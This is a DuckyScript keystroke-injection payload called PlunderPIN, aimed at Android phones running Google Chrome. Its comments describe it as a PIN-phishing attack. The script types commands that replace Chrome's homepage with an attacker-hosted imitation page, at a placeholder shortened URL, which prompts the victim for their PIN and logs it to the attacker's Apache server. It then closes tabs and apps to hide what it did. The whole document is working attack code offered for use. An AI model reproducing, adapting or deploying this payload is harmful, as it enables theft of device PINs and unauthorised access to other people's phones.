1
REM TITLE: PlunderPIN
2
REM AUTHOR: OSINTI4L (https://github.com/OSINTI4L)
3
REM TARGET OS: Android mobile device/Google Chrome (tested on Samsung S24 FE | One UI V8.0 | Android 16 | Google Chrome 143.0.7499.53)
4
REM DESCRIPTION: PlunderPIN is a mobile PIN phishing payload that replaces a user's Google Chrome browser homepage with a malicious imitation homepage that creates prompts to capture the user's PIN and log it to a self hosted Apache webserver. See README.md for full description.
5
REM REQUIREMENTS: See README.md
6

7
DEFINE #Apache_URL http://shorturl.at/Place-URL-Here
8

9
REM Begin attack:
10
ATTACKMODE HID
11
DELAY 1000
12

13
REM Opening Google Chrome:
14
GUI f
15
DELAY 400
16
STRINGLN chrome
17
DELAY 200
18
TAB
19
DELAY 200
20
ENTER
21
DELAY 500
22

23
REM Opening new tab to ensure proper default Chrome environment to execute payload properly:
24
CTRL t
25
DELAY 300
26
SHIFT TAB
27
DELAY 200
28
ENTER
29
DELAY 350
30

31
REM Navigating to Homepage settings:
32
REPEAT 8 DOWNARROW
33
ENTER
34
DELAY 350
35
REPEAT 12 DOWNARROW
36
ENTER
37

38
REM Setting Apache webserver URL as default homepage:
39
DELAY 250
40
REPEAT 6 TAB
41
DELAY 250
42
CTRL a
43
DELAY 250
44
STRINGLN #Apache_URL
45
DELAY 250
46

47
REM Navigating back to original homepage and closing all tabs:
48
ESC
49
DELAY 100
50
ESC
51
DELAY 250
52
SHIFT TAB
53
DELAY 250
54
ENTER
55
DELAY 250
56
REPEAT 4 TAB
57
DELAY 250
58
ENTER
59
DELAY 250
60
REPEAT 3 DOWNARROW
61
DELAY 250
62
ENTER
63
DELAY 250
64
REPEAT 2 TAB
65
ENTER
66

67
REM Closing applications (including browser) and returning to home screen:
68
INJECT_MOD
69
GUI TAB
70
DELAY 300
71
REPEAT 2 DOWNARROW
72
DELAY 150
73
ENTER
74

75